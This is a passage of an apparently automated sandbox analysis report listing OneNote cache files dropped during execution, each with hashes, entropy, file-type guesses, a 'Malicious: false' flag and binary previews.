Preview:	2...>....................................................................................................................................................................................................09......09.{..L...=EJs}.........................09.{..L...=EJs}.09...................................................09......09..................................................09.."...09\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............@..X@.Wa.....N...^.................................................................................................................@..X@.Wa.............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7975238540035654
Encrypted:	false
SSDEEP:	6:+wxRXE7/n3IJ+xCEL/Pc64V9x80cHnD2nHlXoDwcHnD2nHlE6bsqw1E7cbsS:+wfEzn3I6CEWsD4GwsD4CdqQE7S
MD5:	65834A5773B832D2FF723B6976855E5A
SHA1:	D80D8127158F7B7857B9ECEB247963A36C5FF872
SHA-256:	6B554B2D58616709A557C7F67000DCC37E757253A92FE4A4CF3A6DB4253F4DF7
SHA-512:	DAA6D27D1E0BA431BEECF00E7906BD566B2C2687237C74D02490DD6A6AE32504A1873BFB5C63A5D062843C00905B364A65D9FDADA7C0B755D2FF11CA554DEB08
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................rA,.....rA,...oI....I`z6..C.......C..Y\E..$.^..t..C..Y\E..$.^..t..C.rA,...oI....I`z6rA,................................C.......C...................................................C..#....C\......CN....................................................rA,..c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s................C..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........a....QL......~.....N...^...........................................................................................................a....QL......~.....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47672790062196657
Encrypted:	false
SSDEEP:	6:NTcwd9/WLaCkTMkNeyLx8Olu3af4Q5Dw1E/Q5P:Vcwd9/W2GueV3835DQEo5P
MD5:	510FD97531459A564DE5DEF1752AB5F3
SHA1:	2F2E8A12DD55EC191C9FE6A03BB4C121639197E8
SHA-256:	3CAB7ABE63C8A22817EC48A2B1ADC66930C9262EBEEC70211D48659368AE130E
SHA-512:	646A00BA12FC9008A76277627BD0BA594B688E3BFEF7D2D721E68F49C1382F079E33CF7A51185DCC19DF2CF772F1653D0A2825A9A7AF9C18027856A15AAE8301
Malicious:	false
Preview:	2...>...........~..................................................................................................................................................................................................&...L..t.X.............................&...L..t.X..............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...i.w1,..I.35G.[.g....N...^...........................................................................................................i.w1,..I.35G.[.g............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5160941816093423
Encrypted:	false
SSDEEP:	24:9WbVX9VGieIPpVvDXVuVVzFVyRYYdcQJ:97KXdc+
MD5:	ECAA26662173A38322574C513992A9F1
SHA1:	4F30AFF3CBA99ACF3ED830C64B9BE37C8DCA8294
SHA-256:	9B0BB33B6B160CD2C97AEF0F5E1F40D739E370FDDC906E16C7EAE5BF266D1C57
SHA-512:	45253AFFC5F5014A1D69481CFAB3D7C22C07BC22D8E97110CE5A3417E645FC9AA7E79AB6A97EB43062C7F1F3BCB564AE6C602B3F4D07A7BE4FBDC3F679F135BF
Malicious:	false
Preview:	........,.............................?..................................................................................................................................................................4.......4..9..M.T......C.......C....R.M...... y.Y.]lG...4... y..U...b.nM._.T.7..U...C....R.M......C............ y...... y.................................................. y...C.. y.\.... y.N.... y.N.).. y.N.9.. y.N.A..........................C....c..,.........................4..1...(...(.......U.s.e.r........ y...1... ..$....U.s.e.r......................iN..;J.h.C.......C....R.M......2................................4..... y................................4...c..,................... y.. y...1... ..$....U.s.e.r....... y...... y.Y.]lG...4...C.......C....R.M.......4..9..M.T......4......iN..;J.h............................>...............C....R.M...................................................c..,................... y.. y.. y...1... ..$....U.s.e.r...........U.......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7229815983377732
Encrypted:	false
SSDEEP:	6:jxfEQ8O4kS/8V2Sy7WO4yygl/WEjVqUGIx8CAXCkIdWWAXlaF0xcw1Ee0/K:KQlrG7LVyzEBIXngW9Xle0qQEe0/K
MD5:	710AE54499E9D2E1DA6C93C5E3A4147D
SHA1:	1804848C958404215C308578212E193182F0F054
SHA-256:	6769C64D062C11DE0E9E5A26D67DDD1CAB9C303457330CC1BDD9D094D7E5E4FF
SHA-512:	DF2797BFF7F0C238489A6657059F1C7DFE77CD47F54E0AE0901FD435D35894C3BC88EBD53ACEA5C8D5912F940AF4E739DBC43B1B760065B11B0D9F741F034351
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................1.^.....1.^'5?.K.M.y.h..&.x.....&.x..37D.....^..&.x..37D.....^..&.x.1.^'5?.K.M.y.h..1.^..............................&.x.....&.x.................................................&.x..!..&.x\....&.xN....................................................1.^..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........&.x..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............2..L.J.M.........N...^............................................................................................................2..L.J.M.................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47892798161050276
Encrypted:	false
SSDEEP:	6:NTcm8m1OPYUm+DLflyLx8Olu3afR5ektqw1EXnG5ektS:VcmGAMDzlV38RMMqQE2MMS
MD5:	8E7BB909DEA334BD5426ABC44F4EF891
SHA1:	FEC579B536C27A8A0DE3EFEFDDABA8B3EFC12C4D
SHA-256:	72984FF58030467793E87F2D24099CAAD1F5125AED25D3C9CEC777D1A76CCB85
SHA-512:	9A3A917FD11F1347671790EA4FBF3EC1C4D80A2C54AC07C7DAC762359BA6C2930A783587150F94300224507D4E6419823877E5D6483D95828067125890753445
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................l.^.....l.^R.z.E.7.N............................l.^R.z.E.7.N....l.^..................................................l.^.....l.^.................................................l.^.....l.^\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...c.....M.;.....v....N...^...........................................................................................................c.....M.;.....v............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.732440652294679
Encrypted:	false
SSDEEP:	6:K0nCw/D6S4/WhZ+v6QRgZeDyP5MNx8felBkls0C/7elBkls031VGviw1E/Gva:KUCw/ue+TDyPS6eIW/7eIWc1QiQEWa
MD5:	4007668D2715E8F26E94702D8F63C2B1
SHA1:	0053F38D50211484CC827ED79AE26AA14594A194
SHA-256:	6EF7FCACFDCDCA09557E095E9AA39B3A5FDF5A0B15DD0B1AF26C03E5E5AB64FB
SHA-512:	72B8C71A45EE210AFBBEBA925481741D551B2943A9D8A3AB1CF5EA9DE793E6AD27B7E289FB9D8F4F3640F525C322A38F9BE778EC50186EA1E64B7FB92079351F
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................<W......<W.a+..@...Y1;.I~.n.....~.n.\?.N..mi.'$.<W.a+..@...Y1;.I<W..~.n.\?.N..mi.'$.~.n..............................~.n.....~.n.................................................~.n.."..~.n\....~.nN....................................................<W...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............~.n..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........>..fc.M.6o...nZ....N...^............................................................................................................>..fc.M.6o...nZ....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47692647667805066
Encrypted:	false
SSDEEP:	6:NTcAlIrxQHTWSDKFKJYBl/lyLx8Olu3afC3Acw1E73KK:VcAlgQH6SDve/lV38C3BQE73KK
MD5:	A118364C683294230609898A90317E69
SHA1:	7D0A00C37DCD5EB0A8EB952992905EFB58934A25
SHA-256:	356B7A77D883E271F6507EB99E1E48B69875A38CBF2D330A12DB34B1E3CF184C
SHA-512:	D24067F7B0566E1C98A91CA04FF6D93E5F73488A4E2E29E8FF82C05F843491937A770C6C22DD6093CA2B8E31C17BB1E95B11B6B516518DC0BA15EAE966D2DC6D
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................%.......%....\|5M..Sa.M..........................%....\|5M..Sa.M..%....................................................%.......%...................................................%.......%..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....q.RjxQD.^~>P..`....N...^............................................................................................................q.RjxQD.^~>P..`............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6413309458600812
Encrypted:	false
SSDEEP:	12:UeEwL0Y3ZCcnkNYKQQnkNYnQqMqQEL9QqM/K:UA0gZCckNbQQkNdqrHaq
MD5:	B7E000EF99A40769ADDA24ECA7FA85DF
SHA1:	F7A007ABA29E575E2E9E7A80F051730C44C87D3E
SHA-256:	8C3876BF3033DAEAD603DF4574A9120C937CA8CB00113569AFFA309B454DE0CC
SHA-512:	8A01298A060100DA3C43564771DA25EBDF7FA924F1463F16DF2E5D8CC018136FC91CB82300223AFAE451A81CB61775494F942A238649191A51B1D3C53A821D92
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................l.......l...rG.B.L..@~..........................l...rG.B.L..@~..l....................................................l.......l...................................................l...."..l..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s........... .Q.KI.'..O.......N...^............................................................................................................. .Q.KI.'..O...............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7910523900289081
Encrypted:	false
SSDEEP:	12:+wfExb59tlGUruB7ozsD43wsD4CawQEEM:+p59tlZuB7ozn3wnC
MD5:	CC1DB1715AFB89D6D7073D010284F47D
SHA1:	D935744E2BC73428F7E11C55DBFCA26D9639FB5B
SHA-256:	E96D0446B9CCB89992022C23B43D68EEC12AECEEDC082381C180479FFA2A6A59
SHA-512:	B6C8F925456731A9A3D203D559732DAE89294F0FD4672B54F7BFF2B9DFCA743700084B75CB987DADFF06606C003A8965BD25D2C233476D21942FAD1A34676496
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................:.......:...=.3O.U.V....B.......B...i@.Ad......B...i@.Ad......B..:...=.3O.U.V...:................................:.......:...................................................:....#..:..\....:..N.....................................................B...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............:....1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........VH..G.sB..yF.(J.....N...^...........................................................................................................VH..G.sB..yF.(J.....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47715284878657704
Encrypted:	false
SSDEEP:	6:NTc1JwtrQt7hyLx8Olu3afiXlqw1E7jXlS:VcTwFw7hV38eqQE7hS
MD5:	259472B2A2F8506362684D515C352009
SHA1:	2E5E3D31A4AFF48515033EA8DB6616B5AEC34B95
SHA-256:	285D12ADC1BE85688101599EE65C2636E0E783FEDC23AD8011B0CB99D8AFCBE7
SHA-512:	AC3ADB8652F6BBD89215A4CAC2206BD757E968271841E3549F435501AC1AC928BFD1870C66AC8FCAFD6AA11D24282A4738BA6C232B621A0AB552B82B1A5C6229
Malicious:	false
Preview:	2...>...........~................................................................................................................................................................................................(..E..HL.et...........................(..E..HL.et........................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...Y.4....L...cK.......N...^...........................................................................................................Y.4....L...cK...............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6978090823814594
Encrypted:	false
SSDEEP:	6:ga0CtmcdrL2LVr9drqylcCiuH4Um3sx8iDwVudWDwVheQlww1EK6QlM:ghCtm0M42x4/WDwVudWDwVhJlwQE+lM
MD5:	9454A74B73F8E90071EF5D698D4340F3
SHA1:	55185272213A16F8A113A14C201FCBD2A71452EA
SHA-256:	0216C384E8E915DBCE82CBF9FA1ED1E1E1194FFB171407AC16A7A67FE9F3D673
SHA-512:	DC5ACFD798B57D4F3A7862F5660F9D50DAE818909264CBF86308C1F58944B0F20E2BEF16525AF2F78E1D96ECAD79CBC3DD0B9FF5620F4FD14F3F839ED8FDCDBA
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................Rn......Rn-8..E.Q..t..frky.....rkyr.mxB...=X..rkyr.mxB...=X..rky..Rn-8..E.Q..t..f.Rn..............................rky.....rky.................................................rky..!..rky\....rkyN.....................................................Rn..c..,.........................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t..........rky..1... ..$....L.i.v.e.C.o.n.t.e.n.t..............1.HBm.E..1.I......N...^............................................................................................................1.HBm.E..1.I..............................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9198104827034935
Encrypted:	false
SSDEEP:	12:zPgL2ZgkfQki62hEjCgVDS3kjtS0eDaUbcQEwUX0:zY5kokiONhS3kjmdYDX
MD5:	1E2B49F859E1D2F2A1EBAB0A2EC83147
SHA1:	CB740C4E901EF415281399D6EC5A3327C3FD0751
SHA-256:	ABF9EFBED26D2A0E11A6A7B8FED07016B8CE6D9AB7285144704DAEDB5E3039C5
SHA-512:	42B93B6B0006CE4A29C2B70F774C69A8AC4CD86169B1803071D25392672D7BD455CC19CF69BB27FF0DECF763FB9E0FFD29059F73B271DF3C216AAE11380B0CD1
Malicious:	false
Preview:	....>..................................................................................................................................................................................................../h....../h..b'M.=..K.TE.Z.......Z..g.`G....&:C.dA.;d.NA..]..}.fdA...Z..g.`G....&:C.Z.../h..b'M.=..K.TE./h...........Z.......Z...................................................Z...+...Z.\.....Z.N.....Z.N.).........................................../h..c..,.........................4..1...(...(.......1.6.............Z...1... ..$....1.6........Z.......Z..g.`G....&:C.dA......dA.;d.NA..]..}.f2................................/h......................................dA...c..,....................Z...Z...1... ..$....1.6............).?..7B......?....N...^............................................................................................................).?..7B......?............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5021684399921678
Encrypted:	false
SSDEEP:	12:KWJafXOFCtCu4qkJzUa5EUasXOT6sC3sluEUa1d6YhIpEUaId3ezEUauOFQEht:K3sluDol06Fslul6wplBEltOFl
MD5:	5692EDF8BB21DB62811B90A99BDC91B6
SHA1:	61127DE81D9DA586BD2C5B0EC31DE23598FD12B0
SHA-256:	204AF7C31910D6EB6488C323DD499BC0A02439B1B72FADB9F2FAC797628CF005
SHA-512:	50C64028E593F19B0B21687812A7DEA15A0A36F40DA72B44DE7A8BD497F3BCBC0707F2380BC8567DD2F054456E8B6700B570131826F23EDFF1F6539B556FB41D
Malicious:	false
Preview:	........................................................................................................................................................................................................ ....... ...zO@..>[...{...........:.O..p..lm.. ...zO@..>[...{. ..h.J..CA.>O....%h.J.....:.O..p..lm.............$g......$g..................................................$g...B..$g.\....$g.N....$g.N...$g.N.7..$g.N.@..........................h.J..c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........$g...1... ..$....M.a.n.a.g.e.d.............h.J.....h.J..CA.>O....%$g......$g....]K.s..b.Q.2..................................h.J......................................c..,...................$g..$g...1... ..$....M.a.n.a.g.e.d...........~...5H...D.9...~.$g....]K.s..b.Q.$g......:.O..p..lm........>...............h.J..CA.>O....%.......................................... ...c..,...................$g..$g..$g...1... ..$....M.a.n.a.g.e.d...............~.......~...5H...D.9.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7166459237924785
Encrypted:	false
SSDEEP:	6:jxfEB0owEN41MyI1KMbculkQjdWpJx8CAXCkPjDWAXlXuEw1EUISuY:KyjMBfHpkeXn7D9XlXrQEUISn
MD5:	BD9DA4A4200FE67A80068B7FDECA6E0C
SHA1:	4D56EE24BDE3EE3EE2621191C759E8E3D595EECB
SHA-256:	4AFBDB7868F4AE681CCBADCE3D83100670969687598170BEC19E3A2E1B235B82
SHA-512:	DBE70E4FF4592A98E737F5A11B2EEF4AF8C5FD91B0B1835C360AE1BC8E353D8588F245BAF85B7C73C6430953614DEEF86C53D4E7FB8E56119D5AF60364732B9D
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................F.......F..7X>C..".}..N..G.......G.~.B..........G.~.B..........G..F..7X>C..".}..N.F................................F.......F...................................................F...!...F.\.....F.N......................................................G..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........F...1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.................NO>N...V.d......N...^...............................................................................................................NO>N...V.d..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4682428206653837
Encrypted:	false
SSDEEP:	6:NTcYsN34mA0vp/yLx8Olu3af96cZmw1EyS6cX0:VcOqRV38YTQEUc0
MD5:	FBB8281AA9EF8D5ABB5A35875FAAE5DA
SHA1:	3728B2C7307FF47FC3F14A42E47C826C7A8CC000
SHA-256:	93F67B82547DD3BEEDB76E02FF54AAEACF387B4EDD87EA314A431DC8D1E67F78
SHA-512:	F042DE244C2AB8E9E29DFA3A67B3038F6B08899F2E54C18D500598794364A20C3A54890E95AD9600D197D1497F5543A2283564A5404CE83AC471815224497BFA
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................bZZ.....bZZ.E..J.8j..7!.........................bZZ.E..J.8j..7!.bZZ..................................................bZZ.....bZZ.................................................bZZ.....bZZ\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...".a....E.....4......N...^...........................................................................................................".a....E.....4..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7302891034877619
Encrypted:	false
SSDEEP:	12:KUC45LqgjmqgbhehkPeIWZ7eIWc1gPwqQE3PwS:KUHLqg6qg8aP87efb
MD5:	4A1ED1E4AA6842B4B8ED0B32B5BDA566
SHA1:	411241279AC010F36FFC6AAC9C7F2DEAB5387849
SHA-256:	CC31CEC32303FC0CBCF60D409634AE81D7CEC5E4BC3C89C2601C8CEE24224896
SHA-512:	8A6C689975BB560718C5C31CFE0D7D9A412EFD3E1781B41FFE0810E0AC0D8D9AF0E39CC443FA8C988844769A0851180B41E3BF6059D1EE7602A8F52E4F9983FC
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................=x......=x.g.NCB..'Hw)..D.......D..?.9D..E...Q.=x.g.NCB..'Hw)..=x..D..?.9D..E...Q.D................................D.......D...................................................D...."..D..\....D..N....................................................=x...c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..............D....1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........,.u.`.E...a{.l.....N...^............................................................................................................,.u.`.E...a{.l.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.47578777443514786
Encrypted:	false
SSDEEP:	6:NTce/H8AntG8Anr+AttHlKqlyLx8Olu3afhaFlww1E8MZaFlM:Vce/cAntrAnqaKqlV38hsiQE8MZsa
MD5:	4B18361F9886C25489646183E298F56A
SHA1:	655E26D0EE51AFCD8A1FC62B923AF57B46F0F941
SHA-256:	B486F80660BB695979FB4AB5A339AEC793DB49E98AF3C6F2228DC8D1330A1A87
SHA-512:	6289576620A3C8FF401544B0400A86A434A811FB31FDF0575771186A74B8345538C9A22451C489E8925DE3AB2177981E7452BB1DEE5A32B439B07DA06CCD1BC6
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................)$......)$$..)B...%0(...........................)$$..)B...%0(...)$...................................................)$......)$..................................................)$......)$\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...,2...5.M...7.>C.....N...^...........................................................................................................,2...5.M...7.>C.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6546246451864841
Encrypted:	false
SSDEEP:	12:UeEPtmJl8/6THNnkNYKQQnkNYHzQEY3/:U28/OkNbQQkNs
MD5:	949028B04F8850C81DFDA4A066B9F506
SHA1:	B88BB02E28603462E27C6BC460FFDE28445BBBF9
SHA-256:	2250F5B007FD7A2FF8E30F9C2B869E4936FDD1C9EEAE5FABEF94A3DF2E18481A
SHA-512:	67089A5C2F33E6C873920BACF2FE1E8F305CD626BC1539F6EB6BC037FA1D77832DE79097221FBF86F348CB984FA505B4C79F84E82ECA377BC5F2111FB4B77708
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................P.......P....x.G.$.)..5.........................P....x.G.$.)..5.P....................................................P.......P...................................................P...."..P..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...........q.M=.K..9........N...^.............................................................................................................q.M=.K..9................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7983517582108522
Encrypted:	false
SSDEEP:	12:+wfEwcXZfZReWllTFsD4awsD4CqqqQExq/K:+YcJxReW/pnawnRR1
MD5:	66F9175A806D273E390F789A7F0FD270
SHA1:	619E99E1B1471D5142A511369CB24ECA5A92757A
SHA-256:	61C302A0413257E251586B8FA0C38F8FF92B598C3EA1E44192A9E69B5FF91A02
SHA-512:	059CFC73D5080A38586500F83C21967346DD1B006EEF1B7663277265D4AE373191C81734CF487C175D5AB0B65E371F035D55762BC62902D418F5910C7F3918AB
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................>(3.....>(3..=.H..\..F.y.......y...L.yH.\|.Y.@?.y...L.yH.\|.Y.@?.y...>(3..=.H..\..F.>(3..............................>(3.....>(3.................................................>(3..#..>(3\....>(3N....................................................y....c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............>(3..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........s.6i.I....\X......N...^............................................................................................................s.6i.I....\X......................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48112371365632567
Encrypted:	false
SSDEEP:	6:NTcYI8E4m/L2gKqlyLx8Olu3afCFw1Emt:VcAncXlV38GQEq
MD5:	B2E634A49FBFF4B15C58D9FCC6E82784
SHA1:	AF87BFC0DC7E5EE299A2842C9AEB1D7172089E9C
SHA-256:	25154AEF339C4E9B0707FF6AB2F9DD2E967313D505093C72D5F9410B94D41F57
SHA-512:	4A3AFBCF0F8853A15DBFF32AFEDDB1196B1B67CBFAD0E1AF827DDEF32837BA9C5371CC8F4B5B0D95E775CC88B0D7C19F8823091E6BBEDFDE9D0DBE0416A185B1
Malicious:	false
Preview:	2...>...........~..................................................................................................................................................................................................^.;.E.(...rl............................^.;.E.(...rl.............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...K.y<.(.K.K..p$.4....N...^...........................................................................................................K.y<.(.K.K..p$.4............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5361682434865929
Encrypted:	false
SSDEEP:	24:9W1fkgdezC1lOe3BEK6WGIophltp6co8Qdpo:9gdezTexqs
MD5:	193E6FF0505999E12B55372E0544046B
SHA1:	0665DFD8F42573639F69DD778CA99D6DB16A7520
SHA-256:	5E511756B930C4FFE7C38FC081A7DAEB54EF9799BA4A90B5A19021CC26928365
SHA-512:	C0F7C317D3F385ED18CA54EF66BE2147FEDA6B54F453415E2AEB9AAFB429F3876231584E79DB19D2B72128A1435234675AEF6173563CADACFB2A6CC26EE9E3F3
Malicious:	false
Preview:	........,.............................?..................................................................................................................................................................x.......x....EE.~>.....-.......-...t..G..R..sD..Y71...@.....I...Y7..x....EE.~>......x..-...t..G..R..sD#-.............Y7......Y7..................................................Y7..C...Y7\.....Y7N.....Y7N.)...Y7N.9...Y7N.A..........................-....c..,.........................4..1...(...(.......U.s.e.r.........Y7..1... ..$....U.s.e.r............Y7......Y71...@.....I..-.......-...t..G..R..sD.2................................x...Y7...................................x...c..,....................Y7..Y7..1... ..$....U.s.e.r..................:...L..^...-.......-...t..G..R..sD.-...t..G..R..sD#-......:...L..^........U.Y-.\M.DA.m.2..U......>................x....EE.~>...................................................c..,....................Y7..Y7..Y7..1... ..$....U.s.e.r............U......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6935995222066765
Encrypted:	false
SSDEEP:	6:jxfEqt5o7UYvoUClyY8USq7x8CAXCkM5WAXl3pdw1Eghp1:Kqtu7abBmXn49Xl3fQEghT
MD5:	AC78B0C8A0B8E7C01739B8165EB08D1D
SHA1:	CD27526E5E744CB2E4981FB58A4138D03F85ADD4
SHA-256:	5CB3ADF4FC6A254FD93B8C114285A9DC5934533CD4246B08619E79D38B7D1B36
SHA-512:	FB65308BBE27983528930D6D726B261EF9A5E03A5AB97EEB1EEAF7051BA6000AE6F423C2F6D99B31601E87BF39A279D2594B828AA65E4252DC51AC33ECB450AF
Malicious:	false
